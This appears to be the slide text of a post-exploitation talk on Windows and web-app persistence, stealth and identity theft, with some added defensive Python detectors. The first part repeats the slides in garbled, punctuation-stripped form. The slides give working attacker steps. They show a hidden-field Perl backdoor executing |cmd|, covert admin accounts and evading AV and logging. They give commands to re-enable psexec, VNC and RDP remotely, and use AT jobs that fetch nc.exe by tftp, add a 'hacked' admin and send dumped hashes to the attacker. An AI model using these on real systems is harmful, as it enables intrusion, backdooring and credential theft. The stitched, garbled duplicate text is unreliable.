imagine someone is purposefully putting the bugs in

Slide 21

Persistence

bull Leveraging existing persistent admin access

bull Nagios checksbull Attack Configuration Management

ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo

them with our trojans)bull GUIrsquos

bull Tool distribution

Slide 22

Persistence

bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version

ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get

detected

Slide 23

Persistence

bull Add vulnerable codebull Example web apps

ndash Take out user input validationndash Inject your vulnerable code

bull Focus on vague intentbull Never be obviously and solely malicious

ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs

Slide 24

Persistence

bull More web app examplesbull Add hidden field to HTML form

ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt

bull Edit web app and tie vuln perl code to form field input

If defined $hidden_field open($filenamerdquogt$hidden_field)

bull Craft a POST including the hidden field

Slide 25

Persistence

bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected

ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period

bull No rootkits to installbull Tripwire probably wonrsquot see this

Slide 26

Persistence

bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form

fieldsndash If Name = John Smith and Age = 42 then execute

contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to

find

Slide 27

Persistence

bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation

Slide 28

Persistence

bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access

bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)

bull Only use AT to run your commandsbull Persistence without adding files new accounts

ndash Unlikely to be discovered

Slide 29

bull DEMOS

Slide 30

Stealth Evading Detection

Slide 31

Stealth Evading Detection

bull Hiding your activityndash From

bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing

Slide 32

Stealth Evading Detection

bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you

can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist

(helps persistence)ndash On a pen test you should also be testing the

organizations detection and response capabilities

Slide 33

Stealth Evading Detection

bull Goalsndash Keep system operable

bull If it breaks you canrsquot use itbull Someone will come fix it

ndash Operate without fear of detectionndash Robustness

bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS

Slide 34

Stealth Evading Detection

bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption

bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics

bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research

Slide 35

Stealth Evading Detection

bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight

bull Many tools have ONLY malicious usesbull Make your intent hard to determine

ndash Be noisy on one to divert attention from another

Slide 36

Stealth Evading Detection

bull Different Perspectivendash Know the targets environment better than

they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal

behavior

ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious

Slide 37

Stealth Evading Detection

bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs

Slide 38

bull DEMOSndash Kaspersky squeals like a pig

Slide 39

User Identity Theft

Slide 40

User Identity Theft

bull Itrsquos not always about ROOTbull Look like someone else

ndash Use the credentials access of another userbull Goals

ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior

Slide 41

User Identity Theft

bull Stages and techniquesndash Target users

bull Who has access to whatbull Where is the data

ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens

ndash Access is the end goal be it data or another system

Slide 42

User Identity Theft

bull Existing toolsndash Incognito (metasploit)

bull Enumerate hijack tokensndash FUFUTO

bull Enable SYSTEM privilegesbull Change process privileges DKOM

ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials

Slide 43

User Identity Theft

Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My

bull What we wantndash Privileges or SIDrsquos

bull What we getndash Access Access Access

bull How we get itndash Incognito vs FUto

Slide 44

bull DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

bull Changing existing features or settings to benefit our activities

bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access

software

Slide 47

Feature Modification

bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly

bull Not just through existing toolsndash Stealth Persistence requirements

bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement

Slide 48

Feature Modification

bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)

bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)

bull Turning off or adding exceptions to security softwarendash Firewalls AV logging

bull Modifying Local Security Policies

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 51

Feature Modification bull Enabling VNC (from command line)

ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder

bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll

ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo

Vncreg file contents

[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8

Slide 52

Feature Modification

bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app

bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI

bull SCADA systemsbull Security camerasbull Who knows what you might be up to

ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO

Slide 53

Feature Modification bull Enabling Remote Desktop remotely

ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini

[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =

ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account

Slide 54

Feature Modification bull Enabling Remote Desktop remotely

ndash Create another file named enable_tsregWindows Registry Editor Version 500

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]

fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000

ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services

Slide 55

bull DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

bull Oldschool techniques can get results on new problems

bull Remember this is POST exploitation so you already have some access

bull AT command schedules things to run on at a specified time and date

ndash Schedule service must be running

Slide 58

Abusing The Scheduler

bull Often these days certain features are disabled for security

ndash Clipbook shares enumerationbull Use AT to get around these problems

ndash Usually NOT disabled

Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe

Slide 59

Abusing The Scheduler

bull Often AT is still enabled while many other things you typically use are not

bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

bull Building a tool around AT ndash Flow

Slide 16

A word on Stealth vs. Persistence

– In the old days a rootkit helped you maintain root
– Today rootkits are all about hiding
– These two concepts still go hand in hand

Slide 17

Persistence

• Persistence is maintaining access
• Why?
  – Targets can get patched
  – Some exploits are 1-shot only
  – Sometimes you need to return multiple times to the target
  – Target's usefulness is not always immediately known
• Goals: access the target as often as needed/useful
• Huge area of study
• Sometimes persistence doesn't matter

Slide 18

Persistence

• Stages of Persistence
  – Initial access
    • Exploit
    • Stolen password, etc.
  – Decisions: what tool to use?
    • FUZZY – OS, environment, target dependent
  – Setup
  – Re-accessing of target
  – Cleanup: don't be a slob, it will get you caught
    • When you no longer need the target, leave no trace

Slide 19

Persistence

• Existing tools
  – Rootkits
  – Backdoors
  – Trojans
  – Port knockers
  – Adding accounts
  – Things like netcat backdoors, inetd modifications, process injection, stealing credentials, etc.

Slide 20

Persistence

• Different perspective on persistence
  – If you can always re-exploit, who cares?
  – Inject, add, modify new vulnerabilities
    • Hard to determine maliciousness
    • We all know it's hard to find bugs now; imagine someone is purposefully putting the bugs in

Slide 21

Persistence

• Leveraging existing persistent admin access
  • Nagios checks
  • Attack Configuration Management
    – Cfengine
    – SMS
    – Automated Patching Systems ("patch" them with our trojans)
  • GUIs
  • Tool distribution

Slide 22

Persistence

• Example
• Machine has VNC installed
• Replace installed VNC with vulnerable version
  – Authentication bypass
• Copy registry password so target doesn't realize
• Persistence with no backdoors or rootkits to get detected

Slide 23

Persistence

• Add vulnerable code
• Example: web apps
  – Take out user input validation
  – Inject your vulnerable code
• Focus on vague intent
• Never be obviously and solely malicious
  – Look for apps with previous vulnerabilities
  – Re-introduce patched bugs

Slide 24

Persistence

• More web app examples
• Add hidden field to HTML form
  – Users detect no change, app performs normally

    <input type="hidden" name="Lang">

• Edit web app and tie vulnerable Perl code to form field input

    if (defined $hidden_field) { open($filename, ">$hidden_field"); }

• Craft a POST including the hidden field

Slide 25

Persistence

• www.target.com/cgi-bin/app.cgi?lang=|cmd|
• Code will execute your commands
• Who needs to bind a shell to a port?
• Unlikely to ever be detected
  – Especially good in big apps
  – Code review can't even be sure of maliciousness
  – Some sites replace code every X time period
• No rootkits to install
• Tripwire probably won't see this

Slide 26

Persistence

• Take concept to another level
  – Add a decoder to web app
  – Look for a "trigger" string combination in form fields
  – If Name = John Smith and Age = 42 then execute contents of Address field
  – URL encode form entries containing commands
  – Have identifier "stub" in encoded data for app to find

Slide 27

Persistence

• Mixing Stealth with Persistence
  – Further encoding
  – Take entries from all fields
  – Concat them
  – "Decode" commands
  – Rotational ciphers (rot13, Caesar)
  – Even more complex obfuscation
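The web-app pattern on slides 24 through 27 works because Perl's two-argument open() interprets the string it is given: a leading or trailing | names a command to pipe to or from, and a leading <, > or + selects the open mode, so a form value that reaches open() without validation is no longer just a file name. What the defending side wants is an allowlist check in the handler and a scan of request parameters that decodes URL encoding first (so the encoded entries of slide 26 are seen) and flags values carrying those metacharacters. The following is an added example, not code from the talk or its authors; the parameter name, the allowed language codes and the access-log lines are constructed for it.

```python
"""Flag request parameters that Perl's two-argument open() would misread.

Added example: an allowlist check for the form field the slides call Lang,
plus a scanner over decoded query/form parameters and access-log lines.
All names and sample data below are constructed, not taken from the talk.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Values the Lang field is allowed to carry (assumption for the example).
ALLOWED_LANGS = {"en", "de", "fr", "es"}

# What two-argument open() reads out of its "file name" argument:
# leading '|' pipes to a command, trailing '|' pipes from one,
# leading '<', '>', '>>', '+<', '+>' choose the open mode.
PIPE_RE = re.compile(r"^\s*\||\|\s*$")
MODE_RE = re.compile(r"^\s*(\+?[<>]{1,2})")
# Shell metacharacters that never belong in a language code.
SHELL_META = set(";&$`\n")

# Apache-style request line inside a combined log entry.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def is_valid_lang(value: str) -> bool:
    """Allowlist check: what the slide's handler should do before open()."""
    return value in ALLOWED_LANGS


def classify_value(value: str) -> list[str]:
    """Reasons a decoded parameter value looks like open()/shell abuse."""
    reasons = []
    if PIPE_RE.search(value):
        reasons.append("pipe")
    if MODE_RE.search(value):
        reasons.append("redirect")
    if SHELL_META & set(value):
        reasons.append("shell-meta")
    return reasons


def scan_request(method: str, target: str, body: str = "") -> list[dict]:
    """Decode the query string (and a POST body) and report suspect params."""
    params = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    if method == "POST" and body:
        params += parse_qsl(body, keep_blank_values=True)
    findings = []
    for name, value in params:
        reasons = classify_value(value)
        if name.lower() == "lang" and not is_valid_lang(value):
            reasons.append("lang-not-allowlisted")
        if reasons:
            findings.append({"param": name, "value": value, "reasons": reasons})
    return findings


def scan_access_log(lines: list[str]) -> list[tuple[str, list[dict]]]:
    """Run scan_request over the request line of each log entry."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        findings = scan_request(m["method"], m["target"])
        if findings:
            hits.append((m["target"], findings))
    return hits


# Constructed log lines: one benign request, one carrying the slide's |cmd|
# value URL-encoded, and a POST whose body the access log does not record.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Mar/2008:10:01:02 -0700] "GET /cgi-bin/app.cgi?lang=en HTTP/1.1" 200 512',
    '10.0.0.9 - - [12/Mar/2008:10:01:07 -0700] "GET /cgi-bin/app.cgi?lang=%7Ccmd%7C HTTP/1.1" 200 77',
    '10.0.0.9 - - [12/Mar/2008:10:02:11 -0700] "POST /cgi-bin/app.cgi HTTP/1.1" 200 77',
]

if __name__ == "__main__":
    for target, findings in scan_access_log(SAMPLE_LOG):
        print(target, findings)
```

Because access logs do not carry POST bodies, the POST variant of the attack has to be checked where the body is available (a WAF, a reverse proxy, or the application itself); scan_request accepts the body for that case.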

Slide 28

Persistence

• Covert Accounts
  – Add an account / re-enable one
  – Modify local account policies to allow access
    • Ex: SUPPORT_3848576b1, guest
  – Add it to the admin group (net localgroup)
• Only use AT to run your commands
• Persistence without adding files / new accounts
  – Unlikely to be discovered

Slide 29

• DEMOS

Slide 30

Stealth / Evading Detection

Slide 31

Stealth / Evading Detection

• Hiding your activity
  – From:
    • IDS
    • AV
    • LOGGING
    • Suspicious users & admins
    • Firewalls
    • Process listing

Slide 32

Stealth / Evading Detection

• Why Stealth?
  – If you get caught, you get stopped
  – The longer you can operate undetected, the more you can accomplish
  – Admins won't fix problems they don't know exist (helps persistence)
  – On a pen test you should also be testing the organization's detection and response capabilities

Slide 33

Stealth / Evading Detection

• Goals
  – Keep the system operable
    • If it breaks you can't use it
    • Someone will come fix it
  – Operate without fear of detection
  – Robustness
    • Hiding shouldn't require constant attention
  – DON'T LOOK MALICIOUS

Slide 34

Stealth / Evading Detection

• Manual / Existing Tools
  – Rootkits, rootkits, rootkits
  – Meterpreter
  – Encryption
    • Shellcode encoders for IDS evasion
  – Log cleaners
  – Packers
  – Covert channels / Steganography
  – Anti-analysis / anti-forensics
• See all of OC's other talks
• Also Vinnie Liu's Metasploit research

Slide 35

Stealth / Evading Detection

• Different Perspective
  – DON'T BE AN ANOMALY
  – Hide in plain sight
    • Many tools have ONLY malicious uses
    • Make your intent hard to determine
  – Be noisy on one to divert attention from another

Slide 36

Stealth / Evading Detection

• Different Perspective
  – Know the target's environment better than they do
    • If they don't use encryption, maybe you shouldn't either
    • Change strategies to match the environment's normal behavior
  – Don't always default to exploits
    • See the Tactical Exploitation talk
    • IDSs can't see normal behavior that is malicious

Slide 37

Stealth / Evading Detection

• Using Windows security objects for stealth
  – Auditing of Securable Objects is controlled by SACLs
  – Null SACL = No Auditing = No Logs

Slide 38

• DEMOS
  – Kaspersky squeals like a pig

Slide 39

User Identity Theft

Slide 40

User Identity Theft

• It's not always about ROOT
• Look like someone else
  – Use the credentials / access of another user
• Goals
  – Change your identity at will
    • User ID, domain credentials, sessions
    • Impersonate system accounts
    • Make activities look like normal user behavior

Slide 41

User Identity Theft

• Stages and techniques
  – Target users
    • Who has access to what?
    • Where is the data?
  – Change Identity
    • Hijack credentials / sessions
    • Abuse tokens
  – Access is the end goal, be it data or another system

Slide 42

User Identity Theft

• Existing tools
  – Incognito (Metasploit)
    • Enumerate / hijack tokens
  – FU / FUTo
    • Enable SYSTEM privileges
    • Change process privileges (DKOM)
  – SU, SUDO, KSU
  – Process injection
  – Hijack domain credentials

Slide 43

User Identity Theft

Tokens, Privileges, Security Descriptors, SIDs, SACLs, DACLs, ACEs... Oh My!

• What we want
  – Privileges or SIDs
• What we get
  – Access, Access, Access
• How we get it
  – Incognito vs. FUTo

Slide 44

• DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

• Changing existing features or settings to benefit our activities
• Goals
  – Support all Post-Exploitation activities
  – Disabling detection technologies
  – Enabling insecure or easy-to-use access software

Slide 47

Feature Modification

• Feature Modification is basically Securable Object Manipulation
  – Remember all those Tokens and Security Descriptors?
  – These can be modified programmatically and directly
    • Not just through existing tools
  – Stealth / Persistence requirements
    • May make it more advantageous to use custom tools
  – Access objects programmatically
  – Can be much more complex to implement

Slide 48

Feature Modification

• Re-enabling disabled access
  – PsExec: it's still cool (Thanks Mark)
• Enabling GUI access
  – VNC (from a command line)
  – Remote Desktop (even if disabled)
• Turning off or adding exceptions to security software
  – Firewalls, AV, logging
• Modifying Local Security Policies

Slide 49

Feature Modification

• Enabling psexec
  – Psexec was a great, awesome remote shell/command tool
  – Everybody now disables clipbook, which psexec requires (l4m3)
  – Let's re-enable it

Slide 50

Feature Modification

• Enabling psexec
• Use the system control tool sc.exe
  – net use \\target\ipc$ username /user:password
  – sc \\target config netdde start= auto
  – sc \\target config netddedsdm start= auto
  – sc \\target config clipsrv start= auto
  – sc \\target start netdde
  – sc \\target start netddedsdm
  – sc \\target start clipserv

Slide 51

Feature Modification

• Enabling VNC (from command line)
  – Go get VNC (check out guh.nu)
  – Make a folder on the target for the VNC files
  – Copy the following files to the target folder
    • winvnc.exe
    • vnc.reg
    • vnchooks.dll
    • omnithread_rt.dll
  – regedit -s vnc.reg
  – winvnc -install
  – net start "vnc server"
  – winvnc
  – Password is "infected"

vnc.reg file contents:

    [HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
    "SocketConnect"=dword:00000001
    "AutoPortSelect"=dword:00000001
    "InputsEnabled"=dword:00000001
    "LocalInputsDisabled"=dword:00000000
    "IdleTimeout"=dword:00000000
    "QuerySetting"=dword:00000002
    "QueryTimeout"=dword:0000000a
    "PollUnderCursor"=dword:00000000
    "PollForeground"=dword:00000001
    "PollFullScreen"=dword:00000000
    "OnlyPollConsole"=dword:00000001
    "OnlyPollOnEvent"=dword:00000000
    "Password"=hex:10,4d,89,3d,5a,e1,55,f8

Slide 52

Feature Modification

• Enabling Remote Desktop remotely
  – Having a GUI to your target can be necessary
  – Maybe they are running a specialized GUI app
    • Ex: a system controlling access to security doors
  – No command line way of modifying the system, need GUI
    • SCADA systems
    • Security cameras
    • Who knows what you might be up to
  – Remote Desktop is fast and already a feature of the OS
  – However it's often disabled, maybe even by GPO

Slide 53

Feature Modification

• Enabling Remote Desktop remotely
  – Complicated procedure, especially if GPOs are involved
  – Create a file named fix_ts_policy.ini:

    [Unicode]
    Unicode=yes
    [Version]
    signature="$CHICAGO$"
    Revision=1
    [Privilege Rights]
    seremoteinteractivelogonright = hacked_account
    seinteractivelogonright = hacked_account
    sedenyinteractivelogonright =
    sedenyremoteinteractivelogonright =
    sedenynetworklogonright =

  – This file will fix the policy settings that are in your way
  – Change "hacked_account" to a real account

Slide 54

Feature Modification

• Enabling Remote Desktop remotely
  – Create another file named enable_ts.reg:

    Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
    "fDenyTSConnections"=dword:00000000
    "TSEnabled"=dword:00000001
    "TSUserEnabled"=dword:00000000

  – Then perform these commands:
    • sc config termservice start= auto
    • regedit /s enable_ts.reg
    • copy c:\windows\security\database\secedit.sdb c:\windows\security\database\newsecedit.sdb
    • copy c:\windows\security\database\secedit.sdb c:\windows\security\database\origsecedit.sdb
    • secedit /configure /db newsecedit.sdb /cfg fix_ts_policy.ini
    • gpupdate /Force
    • net start "terminal services"
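Slides 53 and 54 change two separate things: registry values under the Terminal Server key, and user-rights assignments applied through secedit. Both are visible to a defender who exports the settings and compares them with a baseline. The following is an added example, not code from the talk or its authors: a small parser for .reg text (dword and hex values, so it also reads the vnc.reg shown on slide 51) and an audit of the [Privilege Rights] section of a secedit template, run over the two files above embedded as text. The approved-account list and the finding messages are assumptions made for the example.

```python
"""Audit Terminal Services registry values and secedit user-rights templates.

Added example: parse .reg text and a secedit .inf/.ini template of the kind
shown on the slides and report every setting that weakens the baseline
(RDP switched on, logon rights granted outside an allowlist, deny-logon
rights cleared). Inputs are the slide files reproduced as constructed text.
"""
import configparser
import re

# The enable_ts.reg and fix_ts_policy.ini contents from the slides, as text.
ENABLE_TS_REG = """Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001
"TSUserEnabled"=dword:00000000
"""

FIX_TS_POLICY_INI = """[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
seremoteinteractivelogonright = hacked_account
seinteractivelogonright = hacked_account
sedenyinteractivelogonright =
sedenyremoteinteractivelogonright =
sedenynetworklogonright =
"""

REG_KEY_RE = re.compile(r"^\[(.+)\]$")
REG_VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"=(?P<type>dword|hex):(?P<data>.+)$')
TS_KEY = "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server"

# Accounts/groups expected to hold logon rights (assumption for the example).
APPROVED_LOGON_ACCOUNTS = {"administrators", "remote desktop users"}
GRANT_RIGHTS = ("seremoteinteractivelogonright", "seinteractivelogonright")
DENY_RIGHTS = ("sedenyinteractivelogonright",
               "sedenyremoteinteractivelogonright",
               "sedenynetworklogonright")


def parse_reg(text: str) -> dict:
    """Return {key_path: {value_name: int | bytes}} for dword and hex values."""
    out, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = REG_KEY_RE.match(line)
        if m:
            current = out.setdefault(m.group(1), {})
            continue
        m = REG_VALUE_RE.match(line)
        if m and current is not None:
            if m["type"] == "dword":
                current[m["name"]] = int(m["data"], 16)
            else:  # hex:aa,bb,... becomes bytes
                current[m["name"]] = bytes(int(b, 16) for b in m["data"].split(","))
    return out


def audit_terminal_services(reg_text: str) -> list[str]:
    """Flag registry values that turn Remote Desktop on."""
    ts = parse_reg(reg_text).get(TS_KEY, {})
    findings = []
    if ts.get("fDenyTSConnections") == 0:
        findings.append("fDenyTSConnections=0: incoming RDP connections allowed")
    if ts.get("TSEnabled") == 1:
        findings.append("TSEnabled=1: terminal services enabled")
    return findings


def audit_privilege_rights(ini_text: str) -> list[str]:
    """Flag logon rights granted to unapproved accounts and cleared deny rights."""
    cfg = configparser.ConfigParser(interpolation=None)
    cfg.read_string(ini_text)
    if not cfg.has_section("Privilege Rights"):
        return []
    rights = cfg["Privilege Rights"]
    findings = []
    for right in GRANT_RIGHTS:
        accounts = [a.strip() for a in rights.get(right, "").split(",") if a.strip()]
        for acct in accounts:
            if acct.lower() not in APPROVED_LOGON_ACCOUNTS:
                findings.append(f"{right} granted to unapproved account {acct}")
    for right in DENY_RIGHTS:
        if right in rights and rights[right].strip() == "":
            findings.append(f"{right} cleared")
    return findings


if __name__ == "__main__":
    for line in audit_terminal_services(ENABLE_TS_REG) + audit_privilege_rights(FIX_TS_POLICY_INI):
        print(line)
```

In practice the .reg text comes from `reg export` of the Terminal Server key and the template from `secedit /export`, so the same two functions can be pointed at a live host's output.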

Slide 55

• DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

• Oldschool techniques can get results on new problems
• Remember this is POST exploitation, so you already have some access
• The AT command schedules things to run at a specified time and date
  – Schedule service must be running

Slide 58

Abusing The Scheduler

• Often these days certain features are disabled for security
  – Clipbook, shares, enumeration
• Use AT to get around these problems
  – Usually NOT disabled

    net use \\target\ipc$ password /user:username
    at \\target 12:00 pm command
    Ex: at \\192.168.1.1 12:00pm tftp -i myip GET nc.exe

Slide 59

Abusing The Scheduler

• Often AT is still enabled while many other things you typically use are not
• AT is as good as having a shell
  – Enable / start services
  – Transfer files
  – Adding users
  – Messing with the registry / policies
  – Pretty much anything you can do with a shell
  – Added bonus: defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

• Building a tool around AT – Flow
  • Establish authenticated session
  • Determine the time on the target
  • Pass commands to the target to be run 1 min from now
  – Write a batch file that executes everything at once
  – Have the target send you back whatever info you want
  – Be mindful of file transfer protocols: TFTP is good but not always "quiet" or available

Slide 61

Abusing The Scheduler

• Common use example
  – net use \\target
  – net time \\target
  – at \\target (net time +1min) "tftp -i use GET e.bat"
  – at \\target (net time +2min) e.bat
  – e.bat does:
    • Adds a user (net user hacked hacked /add)
      – Admin group (net localgroup administrators hacked /add)
    • Gets hashdumping tools and dumps hashes
    • Sends hashes, identified by IP, back to the attacker host

Slide 62

Abusing The Scheduler

• Privileges of LocalSystem that we care about
  – NT AUTHORITY\SYSTEM and BUILTIN\Administrators SIDs
  – SE_IMPERSONATE_NAME
  – SE_TCB_NAME
  – SE_DEBUG_NAME
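The AT flow on slides 57 through 62, and the service re-enabling on slide 50, leave a recognisable trail in the Windows event log: a scheduled task creation (event 4698 on Vista and later; jobs created with AT carry names like At1), a service start-type change (event 7040) for ClipSrv, NetDDE or TermService, and a user creation (4720) followed within minutes by a local-group membership add (4732). The following is an added example, not code from the talk or its authors: three detection rules run over constructed, already-normalised event records. The field names (task_name, command, service, new_start, target_user, member, group) are assumptions standing in for what a log pipeline would extract from the event text, and the records are made up for the example.

```python
"""Detection rules for AT-job, service re-enabling and account-to-admin activity.

Added example: the records below are constructed, already-normalised Windows
events; the dict keys are assumed names for fields a SIEM would extract.
  4698  scheduled task created   7040  service start type changed
  4720  user account created     4732  member added to local group
"""
import re
from datetime import datetime, timedelta

# Command fragments the slides themselves use in the scheduled batch file.
SUSPECT_CMD_RE = re.compile(
    r"\btftp\b|\bnet\s+user\b.*\s/add\b|\bnet\s+localgroup\s+administrators\b",
    re.IGNORECASE,
)
AT_JOB_RE = re.compile(r"^\\?At\d+$", re.IGNORECASE)  # at.exe names jobs At1, At2, ...
WATCHED_SERVICES = {"clipsrv", "netdde", "netddedsdm", "termservice"}
ADMIN_GROUPS = {"administrators"}


def check_task_created(ev: dict):
    """Rule 1: scheduled task with an AT-style name or a suspicious command."""
    if ev["event_id"] != 4698:
        return None
    reasons = []
    if AT_JOB_RE.match(ev.get("task_name", "")):
        reasons.append("legacy AT job name")
    if SUSPECT_CMD_RE.search(ev.get("command", "")):
        reasons.append("suspicious command")
    return reasons or None


def check_service_reenabled(ev: dict):
    """Rule 2: a watched service switched to automatic start."""
    if ev["event_id"] != 7040:
        return None
    if ev.get("service", "").lower() in WATCHED_SERVICES and ev.get("new_start") == "auto start":
        return [f"{ev['service']} set to auto start"]
    return None


def check_account_to_admin(events: list, window: timedelta = timedelta(minutes=5)) -> list:
    """Rule 3: account created (4720) then added to an admin group (4732) within window."""
    created, hits = {}, []
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["event_id"] == 4720:
            created[ev["target_user"].lower()] = ev["time"]
        elif ev["event_id"] == 4732 and ev.get("group", "").lower() in ADMIN_GROUPS:
            t0 = created.get(ev["member"].lower())
            if t0 is not None and ev["time"] - t0 <= window:
                hits.append((ev["computer"], f"{ev['member']} created and added to {ev['group']}"))
    return hits


def run_rules(events: list) -> list:
    """Apply all rules; one alert dict per hit."""
    alerts = []
    for ev in events:
        for rule in (check_task_created, check_service_reenabled):
            reasons = rule(ev)
            if reasons:
                alerts.append({"event_id": ev["event_id"], "computer": ev["computer"], "reasons": reasons})
    for computer, msg in check_account_to_admin(events):
        alerts.append({"event_id": 4732, "computer": computer, "reasons": [msg]})
    return alerts


T = datetime(2008, 3, 12, 10, 0, 0)
SAMPLE_EVENTS = [  # constructed records, two of them benign
    {"time": T, "computer": "WS01", "event_id": 7040, "service": "ClipSrv",
     "old_start": "disabled", "new_start": "auto start"},
    {"time": T + timedelta(seconds=30), "computer": "WS01", "event_id": 4698,
     "task_name": "\\At1", "command": "tftp -i 10.0.0.9 GET e.bat"},
    {"time": T + timedelta(minutes=1), "computer": "WS01", "event_id": 4698,
     "task_name": "\\Backup", "command": "C:\\scripts\\backup.cmd"},
    {"time": T + timedelta(minutes=2), "computer": "WS01", "event_id": 4720,
     "target_user": "hacked"},
    {"time": T + timedelta(minutes=2, seconds=5), "computer": "WS01", "event_id": 4732,
     "member": "hacked", "group": "Administrators"},
    {"time": T + timedelta(hours=3), "computer": "WS02", "event_id": 7040,
     "service": "Spooler", "old_start": "auto start", "new_start": "demand start"},
]

if __name__ == "__main__":
    for alert in run_rules(SAMPLE_EVENTS):
        print(alert)
```

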